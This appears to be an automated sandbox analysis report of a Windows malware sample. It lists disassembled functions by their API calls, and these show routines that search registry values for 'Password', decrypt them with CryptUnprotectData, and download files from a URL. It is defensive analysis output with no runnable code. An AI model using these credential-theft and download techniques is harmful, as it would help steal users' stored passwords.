                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EE037
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE06F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE07D
                            • lstrcat.KERNEL32(?,?), ref: 006EE098
                            • lstrcat.KERNEL32(?,?), ref: 006EE0AC
                            • lstrcat.KERNEL32(?,0100A4A0), ref: 006EE0C0
                            • lstrcat.KERNEL32(?,?), ref: 006EE0D4
                            • lstrcat.KERNEL32(?,0101E4D8), ref: 006EE0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006EE126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: c5fd0255dfbafa7383e04a939e4c8e78fe3ba113511e722eb0c8273beb4ecc3f
                            • Instruction ID: 56ef5b9a2b67abe03ad6d350f320db0492e2977ee905c3706f1116f3dbebd71b
                            • Opcode Fuzzy Hash: c5fd0255dfbafa7383e04a939e4c8e78fe3ba113511e722eb0c8273beb4ecc3f
                            • Instruction Fuzzy Hash: 2061BD71D1122CAFCB61DB64CC58BDDB3BABF58300F1049A9A649A3351DB70AF859F90
                            Function 006D6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6AFF
                            • InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D6B2C
                            • StrCmpCA.SHLWAPI(?,0101FB50), ref: 006D6B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 006D6B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006D6B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006D6BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006D6BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006D6BF0
                            • CloseHandle.KERNEL32(00000000), ref: 006D6C10
                            • InternetCloseHandle.WININET(00000000), ref: 006D6C17
                            • InternetCloseHandle.WININET(?), ref: 006D6C21
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: afa555334efeaaf87bdeca7ad27c1055c80b2113ef21635a49ae350045eb6621
                            • Instruction ID: 18fa1c57571c57d010cd36762819393afdb865d14e7ea53c5038a47fa2f67d6b
                            • Opcode Fuzzy Hash: afa555334efeaaf87bdeca7ad27c1055c80b2113ef21635a49ae350045eb6621
                            • Instruction Fuzzy Hash: 4B417FB1A10215AFDB20DF64DC85FAE77B9EF44700F004456FA05E7280DF70AD409BA4
                            Function 006F4500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,006E4F39), ref: 006F4545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F454C
                            • wsprintfW.USER32 ref: 006F455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006F45CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006F45D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 006F45E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: 9On$%hs$9On
                            • API String ID: 885711575-1522059728
                            • Opcode ID: 5ab3c0ae66d0407ac5f509346426e67baf750f9e5fe258bed653b1386a38e841
                            • Instruction ID: 09fe39018f981b7fbb5e84f623b7d526273e93aff102a02732486d42a6980fd0
                            • Opcode Fuzzy Hash: 5ab3c0ae66d0407ac5f509346426e67baf750f9e5fe258bed653b1386a38e841
                            • Instruction Fuzzy Hash: BB315E72A15209BFDB10EBE4DC49FEF7779AF44700F104059FB05A7180EB70AA418BA5
                            Function 006DBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DBC1F
                            • lstrlen.KERNEL32(00000000), ref: 006DBC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DBC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBCAC
                            • lstrlen.KERNEL32(00704AD4), ref: 006DBD23
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 61caa106fb5859a850b3f5105e3572778dabce16e6b66858aad39b2e7f9be203
                            • Instruction ID: c021cca8111fd4c6c156cdbf6749aaf26e28346cdd5253c5ae3b693345180aa9
                            • Opcode Fuzzy Hash: 61caa106fb5859a850b3f5105e3572778dabce16e6b66858aad39b2e7f9be203
                            • Instruction Fuzzy Hash: AAA17C70E15206CFCB60DF29D959AAEB7B2AF44304F19906AE809DB366DB31DC41CB54
                            Function 006F5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 006F6014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 006F609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F60D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 7edebb6e2a4274e14f2ed6937397938396ef5103633178784d85189946eb41ae
                            • Instruction ID: d36cfcec3cffa3a8ca469b0672dd5dbe9ebcee5f3972ebf19d1e2ffafd9ceb7b
                            • Opcode Fuzzy Hash: 7edebb6e2a4274e14f2ed6937397938396ef5103633178784d85189946eb41ae
                            • Instruction Fuzzy Hash: EB618C70700608EBDB18CF5CC98597EB3B7EB85304B344A99F6928B781CB31AD81CB95
                            Function 006EE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE06F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE07D
                            • lstrcat.KERNEL32(?,?), ref: 006EE098
                            • lstrcat.KERNEL32(?,?), ref: 006EE0AC
                            • lstrcat.KERNEL32(?,0100A4A0), ref: 006EE0C0
                            • lstrcat.KERNEL32(?,?), ref: 006EE0D4
                            • lstrcat.KERNEL32(?,0101E4D8), ref: 006EE0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006EE126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: ad6307e8b8d00f3b7f6f9506bc5b909a63f59b0910ddbd22694dff844ae39af1
                            • Instruction ID: deb615f5be63ccd1a5e4d9d0614f12a72400e7e6a4f6e43b9a808b97f7cf3bbd
                            • Opcode Fuzzy Hash: ad6307e8b8d00f3b7f6f9506bc5b909a63f59b0910ddbd22694dff844ae39af1
                            • Instruction Fuzzy Hash: DD41A971D212289FCB61EB64DC58ADE73BABF58300F0449A9F94A93351DB309F858F90
                            Function 006D7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006D77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D7805
                              • Part of subcall function 006D77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006D784A
                              • Part of subcall function 006D77D0: StrStrA.SHLWAPI(?,Password), ref: 006D78B8
                              • Part of subcall function 006D77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D78EC
                              • Part of subcall function 006D77D0: HeapFree.KERNEL32(00000000), ref: 006D78F3
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006D7A90
                            • lstrcat.KERNEL32(00000000,?), ref: 006D7ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 006D7ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 006D7AF0
                            • wsprintfA.USER32 ref: 006D7B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D7B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D7B47
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006D7B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: dd36ee0a0d3504b4c7299d1bc727c3209e492ca93552c921acb1331138ee50c5
                            • Instruction ID: 0494707fdab37c2210317adf608874b6b3a3bb25bf6bcfe9d59662ab0274e18f
                            • Opcode Fuzzy Hash: dd36ee0a0d3504b4c7299d1bc727c3209e492ca93552c921acb1331138ee50c5
                            • Instruction Fuzzy Hash: 623196B2F18214EFCB10DF68DC449AFB7BAEB88700B18451AE54693350EB74E941DBA1
                            Function 006E81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8243
                            • lstrlen.KERNEL32(00000000), ref: 006E8260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8297
                            • lstrlen.KERNEL32(00000000), ref: 006E82B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E82EB
                            • lstrlen.KERNEL32(00000000), ref: 006E8308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8337
                            • lstrlen.KERNEL32(00000000), ref: 006E8351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E8380
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: b144149c01980974b7bd0194c7d7a4215302c3171d868fa3853ac2f04bbc63a4
                            • Instruction ID: c5a99443bf470e11aca9515e3861fa5cdf4a020dbc5e9db3957f1651066f8f71
                            • Opcode Fuzzy Hash: b144149c01980974b7bd0194c7d7a4215302c3171d868fa3853ac2f04bbc63a4
                            • Instruction Fuzzy Hash: 06517C71A026129FDB10DF7AD868AAAB7AAEF04700F144514AD0ADB345DF30ED50CBE0
                            Function 006D77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D7805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006D784A
                            • StrStrA.SHLWAPI(?,Password), ref: 006D78B8
                              • Part of subcall function 006D7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 006D775E
                              • Part of subcall function 006D7750: RtlAllocateHeap.NTDLL(00000000), ref: 006D7765
                              • Part of subcall function 006D7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006D778D
                              • Part of subcall function 006D7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006D77AD
                              • Part of subcall function 006D7750: LocalFree.KERNEL32(?), ref: 006D77B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D78EC
                            • HeapFree.KERNEL32(00000000), ref: 006D78F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 006D7A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
